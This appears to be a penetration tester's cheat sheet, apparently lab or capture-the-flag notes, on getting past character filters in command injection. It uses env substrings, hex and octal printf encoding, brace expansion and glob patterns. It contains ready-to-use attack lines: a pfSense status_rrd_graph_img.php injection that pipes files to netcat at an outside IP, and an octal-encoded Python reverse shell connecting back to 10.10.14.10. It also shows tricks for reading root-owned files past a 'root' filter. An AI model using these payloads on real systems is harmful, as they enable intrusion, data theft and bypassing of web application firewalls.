Char Evasion Tricks

REF:

PFSense, LFI, WAF

env

Scenario: blocked / and -
We can use env to grab a char we need

> env
HOME=/
LANG=en_US.ISO8559-1

cat ${HOME}         ..slash
cat ${LANG:14:1}    ..dash (wont work in bsd/pfsense)

LFI Example:
..queues;cat+${HOME}home${HOME}rohit${HOME}user.txt|nc+10.10.14.6+4444
nc -nvlp 4444

hex

printf hex (linux)
Doesnt work in bsd

man ascii           .. ascii table
printf "\x41"       .. Hex Char = A

octal

printf octal (bsd)

man ascii              .. find octal in ascii table
printf "\56"           .. period
printf "\55"           .. dash

Example:
echo $(printf "\55")   .. result:  -
wc -c /home/user.txt
wc+$(printf+"\55")c+/home/user.txt

Send to nc
..queues;wc+$(printf+"\55")c+${HOME}home${HOME}rohit${HOME}user.txt|nc+10.10.14.6+9000
nc -nvlp 9001

octal python

Straight from pfsense

#!/usr/bin/env python3
command = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.10',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);'"
payload = ""
for char in command:
	payload += ("\\" + oct(ord(char)).lstrip("0o"))
print(payload)


\160\171\164\150\...              ..result
printf '\160\171\164\150\...'     ..verify

Inject:
https://10.x.x.x/status_rrd_graph_img.php?database=queues;printf+%27\160\171\164\150\...%27|sh

spaces

REF: WAF

{ls,-la,/root}
{cat,file.txt}
cat${IFS}file.txt

/&pwd/&pwd
/var/task&{cat,secret.py}

{/var/log/,-la}
/var/log&{cat,yum.log}
/var/log&{ls,//var/log/yum.log}
/&{cat,/var/log/yum.log}
/&{ls,-la,/home/target/}

Found this hiding behind ...  instead of . ..
{/var/task/...,-la}

Avoid 'root' Filter with Splatting

REF: PrivEscBinaries, nodeHTB

----------------
Root Blocked
echo 'hello' > /tmp/root    ..decode/unzip/cat  ..fail
echo 'hello' > /tmp/*r00t   ..decode/unzip/cat  ..success

----------------
Splatting:
.backup -q secretkey /r**t/r**t.txt > root.txt
base64 -d root.txt > /tmp/secret
unzip secret
cat root/root.txt  ..success

myapp -q secretkey /r**t/r**t.txt > /tmp/encoded
myapp -q secretkey /r??t/roo?.txt > /tmp/encoded
myapp -q secretkey /r*t/r*t.txt > /tmp/encoded

Previous03 Getting In NextEmail SMTP

Last updated 2 years ago

Was this helpful?